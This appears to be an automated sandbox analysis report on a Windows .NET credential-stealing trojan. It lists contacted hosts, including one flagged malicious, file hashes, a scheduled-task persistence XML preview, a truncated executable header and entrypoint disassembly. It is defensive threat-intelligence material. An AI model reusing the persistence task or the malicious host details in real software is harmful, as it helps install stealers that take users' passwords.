http://DynDns.comDynDNSnamejidpasswordPsi/Psi	IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.232.242.170	unknown	United States	14618	AMAZON-AESUS	false
111.118.212.38	strictfacilityservices.com	India	394695	PUBLIC-DOMAIN-REGISTRYUS	true
3.220.57.224	api.ipify.org.herokudns.com	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756190
Start date and time:	2022-11-29 19:35:29 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@12/5@8/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 79 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Simulations

Behavior and APIs

Time	Type	Description
19:36:46	API Interceptor	443x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe modified
19:36:53	Task Scheduler	Run new task: IwUNvHNy path: C:\Users\user\AppData\Roaming\IwUNvHNy.exe
19:37:30	API Interceptor	111x Sleep call for process: IwUNvHNy.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3.232.242.170	a-Skjkmfvbkv.bin.exe	Get hash	malicious	Browse	api.ipify.org/
	library_2.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	271-20221017-86198_98-WS-271-171022151632006-3030-1.exe	Get hash	malicious	Browse	api.ipify.org/
	#U041f#U043b#U0430#U0449#U0430#U043d#U0435.exe	Get hash	malicious	Browse	api.ipify.org/
	d616314c.exe	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.Malware-gen.21488.exe	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.NSIS.Injector.AOW.tr.23479.exe	Get hash	malicious	Browse	api.ipify.org/
	SecuriteInfo.com.IL.Trojan.MSILZilla.16636.8959.exe	Get hash	malicious	Browse	api.ipify.org/
	GxsZM5JTef.dll	Get hash	malicious	Browse	api.ipify.org/
	48oiMWySgT.dll	Get hash	malicious	Browse	api.ipify.org/
	P8F24RBu0U.doc	Get hash	malicious	Browse	api.ipify.org/
	J09ndcF0J1.doc	Get hash	malicious	Browse	api.ipify.org/
	s2205K1342.doc	Get hash	malicious	Browse	api.ipify.org/
	if.bin.dll	Get hash	malicious	Browse	api.ipify.org/
	w3342l2579.doc	Get hash	malicious	Browse	api.ipify.org/
	if.dll	Get hash	malicious	Browse	api.ipify.org/
	if.dll	Get hash	malicious	Browse	api.ipify.org/
	if.dll	Get hash	malicious	Browse	api.ipify.org/
	mixshop_20211229-065147.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	FAB2BBA2.doc	Get hash	malicious	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.ipify.org.herokudns.com	a-Skjkmfvbkv.bin.exe	Get hash	malicious	Browse	3.232.242.170
	SIEM_PO00938467648.vbs	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe	Get hash	malicious	Browse	52.20.78.240
	SHIPMENT DOCUMENTS.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.CrypterX-gen.10947.8437.exe	Get hash	malicious	Browse	52.20.78.240
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe	Get hash	malicious	Browse	54.91.59.199
	MEPS-42.exe	Get hash	malicious	Browse	3.232.242.170
	ORDER.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe	Get hash	malicious	Browse	52.20.78.240
	DHJ59300948.xls	Get hash	malicious	Browse	3.232.242.170
	Quotation.exe	Get hash	malicious	Browse	54.91.59.199
	Cg7vRuVKhI.exe	Get hash	malicious	Browse	3.232.242.170
	SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exe	Get hash	malicious	Browse	3.232.242.170
	Wzf4gWTOC2.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exe	Get hash	malicious	Browse	54.91.59.199
	SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe	Get hash	malicious	Browse	3.232.242.170
	SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.BackDoor.SpyBotNET.25.24486.13932.exe	Get hash	malicious	Browse	54.91.59.199
	buH9VrC1dQ.exe	Get hash	malicious	Browse	54.91.59.199

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	a-Skjkmfvbkv.bin.exe	Get hash	malicious	Browse	3.232.242.170
	https://b6dj2ueylkg.juraganrc.com/?url=aHR0cHM6Ly9ob2xseS1sYXZlbmRlci1yYXR0bGVzbmFrZS5nbGl0Y2gubWUvdmlsZC5odG1s	Get hash	malicious	Browse	44.199.49.219
	SIEM_PO00938467648.vbs	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe	Get hash	malicious	Browse	52.20.78.240
	http://url4483.sosadiazeventos.com/ls/click?upn=mXPGTXlLlQcgRVh-2F4Dp38fDRGJMmpWDEH-2FE76VgzzHi8nDM-2FDFm088Y0fZh2YEo3qbCf_fJCV5gLuaP5-2B7UCkl8vmUj8dC4C9Y4dg1tvjDkrKvY5UHarI7EGwbOBMpE-2F-2BTDbMTeAQqiCIplw1OEed2ml5geiDyCAjnFVFwD7rEXflsrU-2FDtPiBmvBUcn9oohKUiNRFALv-2B8n9tEJ8XP-2Bi8ehDveJ4shY6zR5k78j6VeP8An8lQFfJ6kmEWKqICZhGlO0fhkepKLO1yzpGTF9YmHbAGNDbmtf6HwQ7g1ug0zWgxA8-3D	Get hash	malicious	Browse	34.226.96.6
	robinbot_sample2	Get hash	malicious	Browse	3.84.38.38
	SHIPMENT DOCUMENTS.exe	Get hash	malicious	Browse	52.20.78.240
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652	Get hash	malicious	Browse	54.204.125.248
	robinbot	Get hash	malicious	Browse	34.229.40.203
	robinbot	Get hash	malicious	Browse	34.229.40.203
	SecuriteInfo.com.Win32.CrypterX-gen.10947.8437.exe	Get hash	malicious	Browse	52.20.78.240
	http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2	Get hash	malicious	Browse	35.168.94.234
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	3.220.57.224
	SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe	Get hash	malicious	Browse	54.91.59.199
	MEPS-42.exe	Get hash	malicious	Browse	3.220.57.224
	ORDER.exe	Get hash	malicious	Browse	52.20.78.240
	SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe	Get hash	malicious	Browse	52.20.78.240
	DHJ59300948.xls	Get hash	malicious	Browse	3.232.242.170
	Quotation.exe	Get hash	malicious	Browse	3.220.57.224
	Cg7vRuVKhI.exe	Get hash	malicious	Browse	3.232.242.170
PUBLIC-DOMAIN-REGISTRYUS	SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe	Get hash	malicious	Browse	111.118.212.38
	http://url4483.sosadiazeventos.com/ls/click?upn=mXPGTXlLlQcgRVh-2F4Dp38fDRGJMmpWDEH-2FE76VgzzHi8nDM-2FDFm088Y0fZh2YEo3qbCf_fJCV5gLuaP5-2B7UCkl8vmUj8dC4C9Y4dg1tvjDkrKvY5UHarI7EGwbOBMpE-2F-2BTDbMTeAQqiCIplw1OEed2ml5geiDyCAjnFVFwD7rEXflsrU-2FDtPiBmvBUcn9oohKUiNRFALv-2B8n9tEJ8XP-2Bi8ehDveJ4shY6zR5k78j6VeP8An8lQFfJ6kmEWKqICZhGlO0fhkepKLO1yzpGTF9YmHbAGNDbmtf6HwQ7g1ug0zWgxA8-3D	Get hash	malicious	Browse	43.225.55.221
	SHIPMENT DOCUMENTS.exe	Get hash	malicious	Browse	199.79.62.12
	ORDER.exe	Get hash	malicious	Browse	199.79.62.12
	Quotation.exe	Get hash	malicious	Browse	111.118.212.38
	HBL & MBL.exe	Get hash	malicious	Browse	162.215.240.200
	KWIR000714988.exe	Get hash	malicious	Browse	111.118.212.38
	INV and NOA.exe	Get hash	malicious	Browse	199.79.62.12
	ORDERFT-PO-0276-22 & PO pdf.exe	Get hash	malicious	Browse	208.91.199.223
	payment receipt.exe	Get hash	malicious	Browse	162.215.240.200
	CONTRACT #683793.exe	Get hash	malicious	Browse	199.79.62.12
	SecuriteInfo.com.MSIL.GenKryptik.FYGA.tr.13096.12566.exe	Get hash	malicious	Browse	111.118.212.38
	INV and NOA.exe	Get hash	malicious	Browse	199.79.62.12
	SecuriteInfo.com.Win32.PWSX-gen.27054.5093.exe	Get hash	malicious	Browse	111.118.212.38
	INV & Packing List.exe	Get hash	malicious	Browse	111.118.212.38
	REMITTANCE COPY.exe	Get hash	malicious	Browse	199.79.62.12
	LPO-17-006AD.js	Get hash	malicious	Browse	208.91.199.225
	PO N#U00b0CF004303.js	Get hash	malicious	Browse	208.91.199.225
	PI#102087.exe	Get hash	malicious	Browse	111.118.212.38
	SecuriteInfo.com.Win32.PWSX-gen.30630.28537.exe	Get hash	malicious	Browse	199.79.62.12

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SIEM_PO00938467648.vbs	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	SHIPMENT DOCUMENTS.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	file.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	SkyNet.1448.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	SkyNet.1448.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	solicitud de presupuesto 29-11-2022.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	library.dll	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	MEPS-42.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	11-29-22.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	ORDER.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	Quotation.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	Ziraat-bankasiSwiftMessaji2911202245344.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	Cg7vRuVKhI.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224
	SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exe	Get hash	malicious	Browse	3.232.242.170 3.220.57.224

Process:	C:\Users\user\AppData\Roaming\IwUNvHNy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.log

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmp2885.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1653
Entropy (8bit):	5.16002706959876
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3htn:cbha7JlNQV/rydbz9I3YODOLNdq3p
MD5:	F40F87D29A87D92FDBAF4AB9EA2AD62E
SHA1:	2CC0B2D5242FF42D741D4BE9D1F531B28B7AC654
SHA-256:	8339BEE9CD4844E7B0203BEDA7E523D14BD3CC2CF5A9FF120AB8B308CAD3F72E
SHA-512:	4DF148E8BCEBA1230798FF861827F115EBF6884B2F7EB83C9B0705CA7B81BF12C8A9DA40C175190D91DC2792CC93868B935654187DDD4023EF23833DB961A1FD
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\IwUNvHNy.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1653
Entropy (8bit):	5.16002706959876
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3htn:cbha7JlNQV/rydbz9I3YODOLNdq3p
MD5:	F40F87D29A87D92FDBAF4AB9EA2AD62E
SHA1:	2CC0B2D5242FF42D741D4BE9D1F531B28B7AC654
SHA-256:	8339BEE9CD4844E7B0203BEDA7E523D14BD3CC2CF5A9FF120AB8B308CAD3F72E
SHA-512:	4DF148E8BCEBA1230798FF861827F115EBF6884B2F7EB83C9B0705CA7B81BF12C8A9DA40C175190D91DC2792CC93868B935654187DDD4023EF23833DB961A1FD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

C:\Users\user\AppData\Roaming\IwUNvHNy.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	731648
Entropy (8bit):	7.5267056901942135
Encrypted:	false
SSDEEP:	12288:EMFVoh7SJnnlJgcu34IjRN1T05AtGuFr5cE8LHWK:fFV7nAFrjn+5UAvL
MD5:	65CF34490748F7924DB84DC043F5D81E
SHA1:	1EA50942D4ACF0561BD6BCB3FE0195069EB5C259
SHA-256:	96642679196D3F732718EEBF2E7970D7ECA03DDC4645B3F0292DB847ED82B24E
SHA-512:	0366181FD6A174509B244521E01760116D664B15F0C61BA4DBE1D8C2B35FEBDCDF90836CD553361F0A972ACC1EE2477D3ADA30F9382DC2D895B12C3ACE80C55F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!..c..............P..............<... ...@....@.. ....................................@..................................;..O....@.......................`......L...T............................................ ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B.................;......H.......................................................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r3..p~....o-...(......t$....+..*...0..&........(....r_..p~....o-...(......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.5267056901942135
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
File size:	731648
MD5:	65cf34490748f7924db84dc043f5d81e
SHA1:	1ea50942d4acf0561bd6bcb3fe0195069eb5c259
SHA256:	96642679196d3f732718eebf2e7970d7eca03ddc4645b3f0292db847ed82b24e
SHA512:	0366181fd6a174509b244521e01760116d664b15f0c61ba4dbe1d8c2b35febdcdf90836cd553361f0a972acc1ee2477d3ada30f9382dc2d895b12c3ace80c55f
SSDEEP:	12288:EMFVoh7SJnnlJgcu34IjRN1T05AtGuFr5cE8LHWK:fFV7nAFrjn+5UAvL
TLSH:	7FF46B9132B18573F4DF4279541871CC2D7DB543BAD6E20B6B7B3A4086029BFF6A8E12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!..c..............P..............<... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4b3c0a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63861F21 [Tue Nov 29 15:02:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb3bb6	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb4000	0x608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb184c	0x54	.text
